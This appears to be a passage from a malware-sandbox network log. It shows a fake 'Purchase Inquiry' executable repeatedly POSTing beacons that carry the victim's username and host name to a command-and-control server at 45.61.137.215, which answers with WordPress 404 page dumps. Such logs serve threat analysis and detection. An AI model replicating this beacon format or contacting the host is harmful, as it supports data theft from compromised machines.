                  May 27, 2024 08:32:47.884747028 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.44976145.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:48.035851002 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:48.040802002 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:50.171703100 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:48 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:50.171736956 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:50.171770096 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:50.171802044 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:32:50.171855927 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:32:50.171889067 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:50.171925068 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                  May 27, 2024 08:32:50.171952963 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                  May 27, 2024 08:32:50.171983004 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                  Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                  May 27, 2024 08:32:50.172017097 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.44976245.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:51.597201109 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:51.602142096 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:53.746386051 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:52 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:53.746417046 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:53.746429920 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:53.746439934 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:32:53.746450901 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:32:53.746460915 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                  Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                  May 27, 2024 08:32:53.746469975 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                  Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                  May 27, 2024 08:32:53.746488094 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                  Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                  May 27, 2024 08:32:53.746501923 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                  Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                  May 27, 2024 08:32:53.746512890 CEST1236INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                  Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.44976345.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:53.933876038 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:53.938790083 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:56.188060045 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:54 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:56.188091993 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:32:56.188143015 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:32:56.188193083 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:32:56.188244104 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:32:56.188276052 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:32:56.188309908 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:56.188338041 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
